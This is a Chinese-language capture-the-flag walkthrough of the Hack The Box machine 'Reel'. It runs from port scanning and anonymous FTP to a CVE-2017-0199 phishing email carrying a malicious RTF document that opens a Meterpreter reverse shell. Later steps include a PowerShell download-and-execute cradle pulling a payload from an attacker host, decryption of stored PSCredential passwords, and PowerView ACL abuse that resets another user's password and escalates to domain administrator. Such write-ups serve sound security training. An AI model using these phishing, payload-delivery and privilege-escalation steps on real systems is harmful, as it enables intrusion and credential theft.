Hack The Box - Reel
端口扫描分析:
nmap -sV -sC -Pn -p- -T4 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.16s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.92%I=7%D=4/6%Time=624D4F69%P=x86_64-pc-linux-gnu%r(NULL,
SF:18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20Se
SF:rvice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%r
SF:(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EHL
SF:O\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")
SF:%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20se
SF:quence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x2
SF:0sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands
SF:\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVers
SF:ionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusRequ
SF:estTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"22
SF:0\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20M
SF:ail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n
SF:")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerberos
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mail
SF:\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20rea
SF:dy\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n503
SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x
SF:20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")%
SF:r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindReq
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Mai
SF:l\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence
SF:\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x
SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20
SF:commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb2-time:
| date: 2022-04-06T08:32:23
|_ start_date: 2022-04-06T08:26:16
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2022-04-06T09:32:22+01:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 390.29 seconds
Nmap为我枚举到了21FTP协议、22SSH协议、25SMTP协议但是它是有问号的Nmap不敢确定、445SMB协议以及593 ncacn_http服务,135与49159msrpc。139的netbios-ssn,
而且目标像是在域环境中,操作系统为windows server 2012,它的主机名为REEL,NetBIOS的主机名为REEL\x00,域名为HTB.LOCAL,域森林名为HTB.LOCAL,该主机在域内的全名为REEL.HTB.LOCAL,它的时间与我当前是很不符合的,意味着如果我需要计划任务一些操作,需要核对目标当前主机的系统时间。
访问FTP:
首先我可以尝试对目标FTP端口发起访问请求,因为Nmap告诉我Anonymous FTP login allowed,我可以用尝试用anonymous访问看在其共享文件中能否获取到一些信息:
ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:worldisend): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
我登录了进去,可以尝试dir看起有何共享:
ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> type documents
documents: unknown mode.
ftp> dir
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
FTP中存有一个目录documents,进入发现它为我遗留有两个docx文档,以及一个txt文本文件。我可以将其下载到我本地进行查看。
ftp> prompt
Interactive mode off.
ftp> mget *
local: AppLocker.docx remote: AppLocker.docx
229 Entering Extended Passive Mode (|||41009|)
150 Opening ASCII mode data connection.
100% |***************************************************************************************************************************| 2047 6.94 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 9 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2047 bytes received in 00:00 (4.65 KiB/s)
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||41010|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************************| 124 0.36 KiB/s 00:00 ETA
226 Transfer complete.
124 bytes received in 00:00 (0.25 KiB/s)
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
229 Entering Extended Passive Mode (|||41011|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************************| 14581 18.54 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 51 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
14581 bytes received in 00:00 (15.62 KiB/s)
这是readme.txt中的信息,它似乎是我要我发送一份RTF文本格式的邮件给它:
please email me any rtf format procedures - I'll review and convert.
new format / converted documents will be saved here.
AppLocker.docx,这是它限制我发送运行哪些程序:
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
Windows Event Forwarding.docx,这个目前我不知道是用来干什么的,它像是一个命令记录,像是一个事件中继器:
# get winrm config
winrm get winrm/config
# gpo config
O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS) // add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60 // add to GPO (60 seconds)
on source computer: gpupdate /force
# prereqs
start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server
# list subscriptions / export
C:\Windows\system32>wecutil es > subs.txt
# check subscription status
C:\Windows\system32>wecutil gr "Account Currently Disabled"
Subscription: Account Currently Disabled
RunTimeStatus: Active
LastError: 0
EventSources:
LAPTOP12.HTB.LOCAL
RunTimeStatus: Active
LastError: 0
LastHeartbeatTime: 2017-07-11T13:27:00.920
# change pre-rendering setting in multiple subscriptions
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
# export subscriptions to xml
for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"
# import subscriptions from xml
wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"
# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)
1.
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
2.
Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"
# check subscriptions are being created on the source computer
Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational
#### troubleshooting WEF
collector server -> subscription name -> runtime status
gpupdate /force (force checkin, get subscriptions)
check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors
但是我可以利用exiftool去浏览一下它的元数据:
exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.40
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 KiB
File Modification Date/Time : 2017:11:01 05:13:23+08:00
File Access Date/Time : 2022:04:06 16:51:32+08:00
File Inode Change Date/Time : 2022:04:06 16:51:32+08:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
我得到了一个看起来像是邮箱地址的字符串:nico@megabank.com[1],其他文件没有什么有用的信息了。
SMTP:
22SSH服务端口的服务版本并没有什么现成可利用的漏洞,我不准备现在就对其进行登录凭证爆破,我准备先访问SMTP服务端口验证获取到的这个电子邮箱是否能够利用的。我可以用以下命令访问SMTP服务:
telnet 10.10.10.77 25
然后我可以测试SMTP是否能正常使用,SMTP服务的命令可以去看一眼:
https://www.ibm.com/docs/en/zos/2.2.0?topic=commands-smtp
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO worldisend.com //我告诉它我是谁
250 Hello.
MAIL FROM:worldis@end.com //声明发送人邮箱地址。
250 OK
RCPT TO:@megabank.com> //声明收件人邮箱地址。
250 OK //如果收件人邮箱地址存在,即返回250状态码
RCPT TO: @megabank.com>
//如果目标邮箱服务器在其域内未找到符合的邮箱地址
550 Unknown user //则返回不知道用户550状态码
所以实战情况下可以用smtp-user-enum对其进行邮箱地址枚举,例如:
smtp-user-enum -M RCPT -U user@.txt -t 10.10.10.77
当然Metasploit中也有对应的SMTP枚举模块,但是我因为不知名原因无法使用而这里我只需要验证nico@megabank.com[2]能否正常使用即可。
使用 RTF Dynamite 进行网络钓鱼:
在 Reel 发布时,有一个流行的 RTF 漏洞,它在广泛的攻击中非常常用,它的漏洞编号为CVE-2017-0199[3] 。它将包含恶意代码的RTF文档发给目标用户,当目标打开该恶意RTF文件便会触发内部的恶意代码,恶意代码会到恶意服务器下载并执行有效载荷,致使攻击者获取当前用户的shell。Metasploit内置了该漏洞模块的应用:
msf-pro exploit(multi/handler) > search CVE-2017-0199
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/office_word_hta
msf-pro exploit(multi/handler) > use 0
msf-pro exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.5:4444
msf-pro exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.5:8080/default.hta
[*] Server started.
然后发送文档给目标:
sendEmail -f worldis@end.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v
sendemail以下选项:
•-f- 发送人地址,可以是任何地址,只要域存在。•-t- 收件人地址,nico@megabank.com[4]•-u- 主题•-m- 内容•-a- 附件•-s- smtp 服务器•-v- 详细
Apr 06 20:25:47 google sendEmail[25402]: DEBUG => Connecting to 10.10.10.77:25
Apr 06 20:25:48 google sendEmail[25402]: DEBUG => My IP address is: 10.10.16.5
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 220 Mail Service ready
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: EHLO google
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: MAIL FROM:
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 250 OK
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: RCPT TO:
Apr 06 20:25:49 google sendEmail[25402]: SUCCESS => Received: 250 OK
Apr 06 20:25:49 google sendEmail[25402]: INFO => Sending: DATA
Apr 06 20:25:49 google sendEmail[25402]: SUCCESS => Received: 354 OK, send.
Apr 06 20:25:49 google sendEmail[25402]: INFO => Sending message body
Apr 06 20:25:49 google sendEmail[25402]: Setting content-type: text/plain
Apr 06 20:25:49 google sendEmail[25402]: DEBUG => Sending the attachment [Invoice.rtf]
Apr 06 20:26:01 google sendEmail[25402]: SUCCESS => Received: 250 Queued (12.484 seconds)
Apr 06 20:26:01 google sendEmail[25402]: Email was sent successfully! From: <worldis@end.com> To: Subject: [Invoice Attached] Attachment(s): [Invoice.rtf] Server: [10.10.10.77:25]
过会儿便可以收到一个Meterpreter会话,具体多久我无法确定,:
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Sending stage (175174 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.10.77:56042 ) at 2022-04-06 20:26:27 +0800
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: HTB\nico
meterpreter >
初始访问:
然后可以在C:\Users\nico\Desktop>找到user.txt:
C:\Users\nico\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\nico\Desktop
28/05/2018 21:07 <DIR> .
28/05/2018 21:07 <DIR> ..
28/10/2017 00:59 1,468 cred.xml
28/10/2017 00:40 32 user.txt
2 File(s) 1,500 bytes
2 Dir(s) 15,768,559,616 bytes free
C:\Users\nico\Desktop>
在nico用户桌面有一个cred.xml,我打开看了一眼,看到了其中的Password:
C:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredentialT>
<T>System.ObjectT>
<ToString>System.Management.Automation.PSCredentialToString>
<S N="UserName">HTB\TomS>
"Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692
PowerShell 有一个称为 PSCredential 的对象,它提供了一种存储用户名、密码和凭据的方法。还有两个函数Import-CliXml和Export-CliXml,用于将这些凭据保存到文件并从文件中恢复它们。Export-CliXml为导出到文件,
我可以通过Import-CliXml加载文件从文件中获取明文密码,然后转储结果:
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
C:\Users\nico\Desktop>
我可以通过ssh以Tom身份进行链接获取Tom的权限:
ssh tom@10.10.10.77
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>
在Tom桌面AD Audit目录内有note.txt:
tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit
05/29/2018 09:02 PM <DIR> .
05/29/2018 09:02 PM <DIR> ..
05/30/2018 12:44 AM <DIR> BloodHound
05/29/2018 09:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,768,489,984 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
令人惊讶的是,从用户到Domain Admin没有AD攻击路径(使用默认最短路径查询)。
Maybe we should re-run Cypher query against other groups we've created. 也许我们应该对我们创建的其他组重新运行Cypher查询。
tom@REEL C:\Users\tom\Desktop\AD Audit>
再往目录深处走,靶场很贴心的为我准备了很多文件:
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound
05/30/2018 12:44 AM <DIR> .
05/30/2018 12:44 AM <DIR> .. 05/29/2018 08:57 PM <DIR> Ingestors
10/30/2017 11:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,768,489,984 bytes free
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>DIR Volume in drive C has no label. Volume Serial Number is CC8A-33E1
Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors 05/29/2018 08:57 PM .
05/29/2018 08:57 PM <DIR> .. 11/17/2017 12:50 AM 112,225 acls.csv
10/28/2017 09:50 PM 3,549 BloodHound.bin
10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 04:27 PM 568,832 SharpHound.exe
10/24/2017 04:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,768,489,984 bytes free
为了与目标交互方便,我使用CobaltStrike向Tom进行Web载荷投递,因为我有Tom的终端,Metasploit不知为何失败了:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.9:80/a'))"
我通过CobaltStrike把acls.csv下载了下来,它向我提供了一大堆目标域内用户组的信息,直接把我人看晕了,然而新版的BloodHound不支持csv格式的解析,但是旧版本1.5.2的可以:
https://github.com/BloodHoundAD/BloodHound/releases/tag/1.5.2
然后我发现了一个Backup_admin的备份组,CLAIRE对其有WriteDacl权限,而Tom对其拥有Owns权。而目标在C:\Users\tom\Desktop\AD Audit\BloodHound为我准备了PowerView。
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.
PS C:\Users\tom\Desktop\AD Audit\BloodHound> . .\PowerView.ps1
注意" . " ,一个" . "会因为作用域不同而报错,具体详细说明可以参考微软官方powershell文档:
https://docs.microsoft.com/zh-cn/powershell/module/microsoft.powershell.core/about/about_scripts?view=powershell-7.2
然后,我将Tom设置为 claire 的 ACL 的拥有者:
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
我授予Tom更改claire 的 ACL中密码的权限:
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
然后我将创建一个密码凭证对象:
$cred = ConvertTo-SecureString "qwerQWER1234!@#$" -AsPlainText -force
并将它作为claire的登录密码:
Set-DomainUserPassword -identity claire -accountpassword $cred
那么我就可以通过SSH以claire身份登录目标系统:
ssh claire@10.10.10.77
claire@10.10.10.77's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
claire@REEL C:\Users\claire>
那么我可以先看一眼Backup_admin备份组的成员用户:
net group backup_admins
Group name Backup_Admins
Comment
Members
-------------------------------------------------------------------------------
ranj
The command completed successfully.
它的成员只有ranj,我可以将claire添加进去:
net group backup_admins claire /add
Group name Backup_Admins
Comment
Members
-------------------------------------------------------------------------------
claire ranj
The command completed successfully.
我需要关闭ssh链接并重新登录,然后我可以尝试去访问Administrator目录,我尝试读取root.txt,它不让我读:
Directory of C:\Users\Administrator\Desktop
01/21/2018 02:56 PM <DIR> .
01/21/2018 02:56 PM <DIR> ..
11/02/2017 09:47 PM <DIR> Backup Scripts
10/28/2017 11:56 AM 32 root.txt
1 File(s) 32 bytes
3 Dir(s) 15,725,092,864 bytes free
claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.
然后我看到它目录中有个Backup Scripts,我进去查看发现了一些备份脚本:
Directory of C:\Users\Administrator\Desktop\Backup Scripts
11/02/2017 09:47 PM <DIR> .
11/02/2017 09:47 PM <DIR> ..
11/03/2017 11:22 PM 845 backup.ps1
11/02/2017 09:37 PM 462 backup1.ps1
11/03/2017 11:21 PM 5,642 BackupScript.ps1
11/02/2017 09:43 PM 2,791 BackupScript.zip
11/03/2017 11:22 PM 1,855 folders-system-state.txt
11/03/2017 11:22 PM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 15,725,092,864 bytes free
而在BackupScript.ps1有这样一条信息:
# admin password
$password="Cr4ckMeIfYouC4n!"
拿下权限:
我尝试用administrator身份登录并以此作密码:
ssh administrator@10.10.10.77
我成功了登录了,并且我可以访问到root.txt:
administrator@REEL C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1
Directory of C:\Users\Administrator\Desktop
21/01/2018 15:56 <DIR> .
21/01/2018 15:56 <DIR> ..
02/11/2017 22:47 <DIR> Backup Scripts
28/10/2017 12:56 32 root.txt
1 File(s) 32 bytes
3 Dir(s) 15,757,074,432 bytes free
administrator@REEL C:\Users\Administrator\Desktop>type root.txt
References
[1] nico@megabank.com: mailto:nico@megabank.com[2] nico@megabank.com: mailto:nico@megabank.com[3] CVE-2017-0199: https://nvd.nist.gov/vuln/detail/CVE-2017-0199[4] nico@megabank.com: mailto:nico@megabank.com